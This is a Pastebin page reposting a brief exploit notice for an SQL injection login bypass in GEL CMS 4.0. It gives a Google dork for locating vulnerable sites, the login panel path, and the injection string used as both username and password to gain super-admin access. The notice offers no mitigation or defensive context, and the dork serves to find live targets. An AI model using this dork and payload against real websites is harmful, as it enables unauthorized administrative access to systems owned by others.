Advertisement
Kyfx

GEL CMS 4.0 SQL Injection

May 21st, 2015
436
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1. ** Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
  2. ** Google Dork: inurl:/contact-us_id7.php
  3. ** Date: 11 August 2014
  4. ** Exploit Author: Guillermo Garcia Marcos @GuilleSec
  5. ** Severity: High
  6. ** Versions: 4.00 and latest versions.
  7. ** Tested on: Debian (Apache+MySQL)
  8.  
  9. Loginpanel:
  10.  
  11. domain.lol/login.php
  12.  
  13. SQL string:
  14.  
  15. Username: 'or'1'='1
  16. Password: 'or'1'='1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement